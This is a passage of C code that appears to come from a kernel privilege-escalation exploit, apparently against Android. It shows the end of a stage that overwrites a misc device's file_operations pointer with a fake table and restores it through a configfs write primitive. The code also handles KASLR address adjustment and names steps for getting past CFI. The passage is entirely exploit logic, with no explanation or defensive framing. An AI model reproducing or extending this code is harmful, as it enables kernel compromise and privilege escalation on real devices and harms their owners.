  cfi_owner_ret = owner;
  SYSCHK(close(fd));
  if (owner == (ssize_t)sizeof(null_owner) &&
      restore == (ssize_t)sizeof(original_fops)) {
    cfi_last_step = 0;
    cfi_last_errno = 0;
    atomic_store(&cfi_stage_done, 1);
    return 1;
  }
  cfi_last_step = 7;
  cfi_last_errno = errno;
  return 0;

fail:
  if (dirty) {
    uint64_t original_fops_fail = p0_data_alias(ASHMEM_FOPS);
    if (kaslr_done) {
      original_fops_fail = canon_addr(ASHMEM_FOPS);
    }
    cfi_restore_ret = configfs_write_once(
        fd, misc_fops, &original_fops_fail, sizeof(original_fops_fail));
    if (can_read_back &&
        cfi_restore_ret == (ssize_t)sizeof(original_fops_fail)) {
      uint64_t after_fail = 0;
      if (configfs_read_once(fd, misc_fops, &after_fail, sizeof(after_fail)) ==
          (ssize_t)sizeof(after_fail)) {
        fops_after = after_fail;
      }
    }
    uint64_t null_owner_fail = 0;
    cfi_owner_ret = configfs_write_once(
        fd, fake_fops, &null_owner_fail, sizeof(null_owner_fail));
  }
  SYSCHK(close(fd));
  return 0;
}
